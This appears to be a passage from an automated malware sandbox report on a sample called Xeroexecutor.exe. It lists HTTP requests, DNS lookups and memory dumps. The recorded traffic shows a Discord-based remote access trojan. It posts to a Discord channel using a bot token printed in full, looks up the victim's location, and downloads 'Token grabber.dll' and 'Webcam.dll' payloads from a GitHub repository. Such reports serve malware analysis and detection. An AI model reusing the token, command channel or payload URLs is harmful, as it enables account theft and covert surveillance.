    alt-svc: h3=":443"; ma=86400
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=T%2Fu8bG6l90l9JOVacq7Pa4cghpHOoWWMnB%2FZeFyCfBH%2Ft6EPG0Qf9LSPf9zU2BEkR%2BzBetIlsafnoZJ75DAcob10PQz4vGhVT89cIKfEXGY%2BXIBhi6aVdeChPul2"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    X-Content-Type-Options: nosniff
    Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
    Set-Cookie: __sdcfduid=f181d76a0e0f11efb6b79ac70ff69aa5f0e09a6a2ccd5fe0edea1959d498408e6e9fd9d42fbd5775fee476eb4a9324f3; Expires=Tue, 08-May-2029 14:25:11 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
    Set-Cookie: __cfruid=948f4f443802a6bf7701eb9ed1444e066c3e880a-1715264711; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
    Set-Cookie: _cfuvid=_6stMbfZGNtJeHtgtFb9NqukjykNIaUUXTzLq.f4tWI-1715264711133-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
    Server: cloudflare
    CF-RAY: 88125b7b0ac77735-LHR
  • US
    POST
    https://discord.com/api/v9/channels/1238134282950676521/messages
    Xeroexecutor.exe
    Remote address:
    162.159.136.232:443
    Request
    POST /api/v9/channels/1238134282950676521/messages HTTP/1.1
    authorization: Bot MTIwNjA0MDA2MDI2NTM2NTUwNA.GStFBi.KFxuLXKvS3XujUPdFiaRzwKmwtmjd2uDdKdcmY
    Content-Type: application/json; charset=utf-8
    Host: discord.com
    Content-Length: 31
    Expect: 100-continue
    Response
    HTTP/1.1 200 OK
    Date: Thu, 09 May 2024 14:25:11 GMT
    Content-Type: application/json
    Transfer-Encoding: chunked
    Connection: keep-alive
    set-cookie: __dcfduid=f1b5d7720e0f11ef8ac69a2afe861c28; Expires=Tue, 08-May-2029 14:25:11 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
    strict-transport-security: max-age=31536000; includeSubDomains; preload
    x-ratelimit-bucket: 3df15bae86f6647dd4dfcbd5c6949480
    x-ratelimit-limit: 5
    x-ratelimit-remaining: 3
    x-ratelimit-reset: 1715264713.003
    x-ratelimit-reset-after: 1.625
    vary: Accept-Encoding
    via: 1.1 google
    alt-svc: h3=":443"; ma=86400
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4fYgpmitI9XGFTCOECvkpOA77LqT3aIuvGWvg0pGqiWcZDl8AmZOQQybcpcccv6TE%2BuOcmkUDDnt55xMQe9%2Bd%2BFtlO45gwrjvOXUUczNPIRSd48e5NquGAotuF5P"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    X-Content-Type-Options: nosniff
    Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
    Set-Cookie: __sdcfduid=f1b5d7720e0f11ef8ac69a2afe861c2857829e51cb1a8c1ccb9eba97384b7b93537ca007483cd314cc7024e245d88471; Expires=Tue, 08-May-2029 14:25:11 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
    Set-Cookie: __cfruid=948f4f443802a6bf7701eb9ed1444e066c3e880a-1715264711; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
    Set-Cookie: _cfuvid=sb7g7xGgB1ReIR8sSMdB6p1Sflw3U6y0o7NLYCBKE7I-1715264711474-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
    Server: cloudflare
    CF-RAY: 88125b7d6fb0069e-LHR
  • US
    POST
    https://discord.com/api/v9/channels/1238134282950676521/messages
    Xeroexecutor.exe
    Remote address:
    162.159.136.232:443
    Request
    POST /api/v9/channels/1238134282950676521/messages HTTP/1.1
    authorization: Bot MTIwNjA0MDA2MDI2NTM2NTUwNA.GStFBi.KFxuLXKvS3XujUPdFiaRzwKmwtmjd2uDdKdcmY
    Content-Type: application/json; charset=utf-8
    Host: discord.com
    Content-Length: 31
    Expect: 100-continue
    Response
    HTTP/1.1 200 OK
    Date: Thu, 09 May 2024 14:25:26 GMT
    Content-Type: application/json
    Transfer-Encoding: chunked
    Connection: keep-alive
    set-cookie: __dcfduid=fa7a908c0e0f11ef8fa15239c9fc6a72; Expires=Tue, 08-May-2029 14:25:26 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
    strict-transport-security: max-age=31536000; includeSubDomains; preload
    x-ratelimit-bucket: 3df15bae86f6647dd4dfcbd5c6949480
    x-ratelimit-limit: 5
    x-ratelimit-remaining: 4
    x-ratelimit-reset: 1715264727.003
    x-ratelimit-reset-after: 1.000
    vary: Accept-Encoding
    via: 1.1 google
    alt-svc: h3=":443"; ma=86400
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OzwDyl4AN81y2GOqAcQJihZEunv5X2y%2BdytZW9W2oG7YpU7M03wmvu51L2FJLeT4WgiwCvuIwBUc8rGCEx4ocyl22aE0niSM6Y%2BDiINdaBjmuw8GOVP2t6UDzH0B"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    X-Content-Type-Options: nosniff
    Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
    Set-Cookie: __sdcfduid=fa7a908c0e0f11ef8fa15239c9fc6a72e2386f67c32610e00fc96078c12b62436b198249c0fbecd8bbf7aa689ffd1681; Expires=Tue, 08-May-2029 14:25:26 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
    Set-Cookie: __cfruid=c1bf6e0aa6fe3bc4e575146062fcb7c960ea5867-1715264726; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
    Set-Cookie: _cfuvid=CTf82cX6ERFRVnnpXT7cAN1cT5TgC0TS0Vgw5tH1x_c-1715264726185-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
    Server: cloudflare
    CF-RAY: 88125bd85a89768c-LHR
  • 162.159.135.234:443
    https://gateway.discord.gg/?v=9&encording=json
    tls, http
    Xeroexecutor.exe
    2.8kB
    33.5kB
    43
    48

    HTTP Request

    GET https://gateway.discord.gg/?v=9&encording=json

    HTTP Response

    101
  • 162.159.136.232:443
    https://discord.com/api/v9/guilds/1237709600602722354/channels
    tls, http
    Xeroexecutor.exe
    1.1kB
    5.3kB
    11
    13

    HTTP Request

    POST https://discord.com/api/v9/guilds/1237709600602722354/channels

    HTTP Response

    201
  • 159.89.102.253:443
    https://geolocation-db.com/json/
    tls, http
    Xeroexecutor.exe
    888 B
    4.6kB
    10
    11

    HTTP Request

    GET https://geolocation-db.com/json

    HTTP Response

    301

    HTTP Request

    GET https://geolocation-db.com/json/

    HTTP Response

    200
  • 162.159.136.232:443
    https://discord.com/api/v9/channels/1238134282950676521/messages
    tls, http
    Xeroexecutor.exe
    1.3kB
    3.0kB
    9
    10

    HTTP Request

    POST https://discord.com/api/v9/channels/1238134282950676521/messages

    HTTP Response

    200
  • 162.159.136.232:443
    https://discord.com/api/v9/channels/1238134282950676521/messages
    tls, http
    Xeroexecutor.exe
    484.4kB
    10.8kB
    362
    183

    HTTP Request

    POST https://discord.com/api/v9/channels/1238134282950676521/messages

    HTTP Response

    200
  • 162.159.136.232:443
    https://discord.com/api/v9/channels/1238134282950676521/messages
    tls, http
    Xeroexecutor.exe
    1.2kB
    3.0kB
    9
    11

    HTTP Request

    POST https://discord.com/api/v9/channels/1238134282950676521/messages

    HTTP Response

    200
  • 162.159.136.232:443
    https://discord.com/api/v9/channels/1238134282950676521/messages
    tls, http
    Xeroexecutor.exe
    5.0kB
    3.5kB
    13
    13

    HTTP Request

    POST https://discord.com/api/v9/channels/1238134282950676521/messages

    HTTP Response

    200
  • 162.159.136.232:443
    https://discord.com/api/v9/channels/1238134282950676521/messages
    tls, http
    Xeroexecutor.exe
    1.2kB
    2.9kB
    9
    10

    HTTP Request

    POST https://discord.com/api/v9/channels/1238134282950676521/messages

    HTTP Response

    200
  • 52.111.227.14:443
    322 B
    7
  • 185.199.109.133:443
    https://raw.githubusercontent.com/moom825/Discord-RAT-2.0/master/Discord%20rat/Resources/Token%20grabber.dll
    tls, http
    Xeroexecutor.exe
    60.8kB
    3.0MB
    1265
    2164

    HTTP Request

    GET https://raw.githubusercontent.com/moom825/Discord-RAT-2.0/master/Discord%20rat/Resources/Token%20grabber.dll

    HTTP Response

    200
  • 162.159.136.232:443
    https://discord.com/api/v9/channels/1238134282950676521/messages
    tls, http
    Xeroexecutor.exe
    1.1kB
    2.9kB
    8
    9

    HTTP Request

    POST https://discord.com/api/v9/channels/1238134282950676521/messages

    HTTP Response

    200
  • 162.159.136.232:443
    https://discord.com/api/v9/channels/1238134282950676521/messages
    tls, http
    Xeroexecutor.exe
    1.2kB
    2.9kB
    9
    10

    HTTP Request

    POST https://discord.com/api/v9/channels/1238134282950676521/messages

    HTTP Response

    200
  • 185.199.109.133:443
    https://raw.githubusercontent.com/moom825/Discord-RAT-2.0/master/Discord%20rat/Resources/Webcam.dll
    tls, http
    Xeroexecutor.exe
    1.5kB
    43.3kB
    20
    36

    HTTP Request

    GET https://raw.githubusercontent.com/moom825/Discord-RAT-2.0/master/Discord%20rat/Resources/Webcam.dll

    HTTP Response

    200
  • 162.159.136.232:443
    https://discord.com/api/v9/channels/1238134282950676521/messages
    tls, http
    Xeroexecutor.exe
    1.2kB
    3.0kB
    9
    11

    HTTP Request

    POST https://discord.com/api/v9/channels/1238134282950676521/messages

    HTTP Response

    200
  • 162.159.136.232:443
    https://discord.com/api/v9/channels/1238134282950676521/messages
    tls, http
    Xeroexecutor.exe
    1.2kB
    3.0kB
    9
    11

    HTTP Request

    POST https://discord.com/api/v9/channels/1238134282950676521/messages

    HTTP Response

    200
  • 162.159.136.232:443
    https://discord.com/api/v9/channels/1238134282950676521/messages
    tls, http
    Xeroexecutor.exe
    1.2kB
    2.9kB
    9
    10

    HTTP Request

    POST https://discord.com/api/v9/channels/1238134282950676521/messages

    HTTP Response

    200
  • 8.8.8.8:53
    gateway.discord.gg
    dns
    Xeroexecutor.exe
    64 B
    144 B
    1
    1

    DNS Request

    gateway.discord.gg

    DNS Response

    162.159.135.234
    162.159.133.234
    162.159.130.234
    162.159.136.234
    162.159.134.234

  • 8.8.8.8:53
    discord.com
    dns
    Xeroexecutor.exe
    57 B
    137 B
    1
    1

    DNS Request

    discord.com

    DNS Response

    162.159.136.232
    162.159.137.232
    162.159.135.232
    162.159.138.232
    162.159.128.233

  • 8.8.8.8:53
    234.135.159.162.in-addr.arpa
    dns
    74 B
    136 B
    1
    1

    DNS Request

    234.135.159.162.in-addr.arpa

  • 8.8.8.8:53
    geolocation-db.com
    dns
    Xeroexecutor.exe
    64 B
    80 B
    1
    1

    DNS Request

    geolocation-db.com

    DNS Response

    159.89.102.253

  • 8.8.8.8:53
    232.136.159.162.in-addr.arpa
    dns
    74 B
    136 B
    1
    1

    DNS Request

    232.136.159.162.in-addr.arpa

  • 8.8.8.8:53
    253.102.89.159.in-addr.arpa
    dns
    73 B
    140 B
    1
    1

    DNS Request

    253.102.89.159.in-addr.arpa

  • 8.8.8.8:53
    raw.githubusercontent.com
    dns
    Xeroexecutor.exe
    71 B
    135 B
    1
    1

    DNS Request

    raw.githubusercontent.com

    DNS Response

    185.199.109.133
    185.199.111.133
    185.199.108.133
    185.199.110.133

  • 8.8.8.8:53
    133.109.199.185.in-addr.arpa
    dns
    74 B
    118 B
    1
    1

    DNS Request

    133.109.199.185.in-addr.arpa

  • 8.8.8.8:53
    13.227.111.52.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    13.227.111.52.in-addr.arpa

MITRE ATT&CK Enterprise v15

Downloads

  • memory/2676-0-0x00000281E93F0000-0x00000281E9408000-memory.dmp

    Filesize

    96KB

  • memory/2676-1-0x00007FFA5EE13000-0x00007FFA5EE14000-memory.dmp

    Filesize

    4KB

  • memory/2676-2-0x00000281EBAB0000-0x00000281EBC72000-memory.dmp

    Filesize

    1.8MB

  • memory/2676-3-0x00007FFA5EE10000-0x00007FFA5F7FC000-memory.dmp

    Filesize

    9.9MB

  • memory/2676-4-0x00000281EC3B0000-0x00000281EC8D6000-memory.dmp

    Filesize

    5.1MB

  • memory/2676-5-0x00007FFA5EE13000-0x00007FFA5EE14000-memory.dmp

    Filesize

    4KB

  • memory/2676-6-0x00007FFA5EE10000-0x00007FFA5F7FC000-memory.dmp

    Filesize

    9.9MB

  • memory/2676-7-0x00000281EBE80000-0x00000281EC14A000-memory.dmp

    Filesize

    2.8MB

  • memory/2676-8-0x00000281EB000000-0x00000281EB00E000-memory.dmp

    Filesize

    56KB